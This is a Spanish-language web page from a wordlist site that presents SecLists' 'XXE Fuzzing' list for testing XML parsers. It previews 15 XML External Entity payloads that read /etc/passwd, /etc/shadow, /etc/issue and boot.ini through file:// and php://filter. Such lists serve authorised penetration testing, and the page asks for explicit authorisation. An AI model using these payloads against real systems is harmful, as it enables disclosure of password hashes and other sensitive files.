Skip to content
cyberwordlists
Fuzzing4.8 KB

XXE Fuzzing

Payloads de XML External Entity que incluyen declaraciones DOCTYPE/ENTITY para la divulgación de archivos mediante los wrappers file:// y php://filter. Para probar parsers XML en busca de XXE.

Ver fuente
Tamaño
4.8 KB
Categoría
Fuzzing
Fuente
danielmiessler/SecLists
Licencia
MIT
Herramientas recomendadas
wfuzzburp

Vista previa

Las primeras 15 entradas. Descarga o copia la lista completa (4.8 KB) con los botones de arriba.

>head xxe-fuzzing-seclists.txt4.8 KB
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" >
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
<!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
<?xml version="1.0" encoding="ISO-8859-1"?><test></test>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>

Payloads de XML External Entity que incluyen declaraciones DOCTYPE/ENTITY para la divulgación de archivos mediante los wrappers file:// y php://filter. Para probar parsers XML en busca de XXE.

Esta lista está orientada al fuzzing de entradas y el descubrimiento de vulnerabilidades. Contiene aproximadamente 4.8 KB y funciona bien con herramientas como wfuzz, burp. Elige la lista más pequeña que se ajuste a tu engagement: las listas más cortas son más rápidas y silenciosas para los ataques en línea, mientras que las listas más grandes ofrecen mayor cobertura para el trabajo offline donde la velocidad es menos determinante.

Puedes copiar la vista previa de muestra directamente desde esta página, copiar la lista completa a tu portapapeles o descargar el archivo .txt sin procesar. La lista completa se sirve directamente desde su fuente original en GitHub.

Obtenida de danielmiessler/SecLists y distribuida bajo MIT. Utiliza wordlists únicamente contra sistemas para los que tengas autorización explícita de prueba.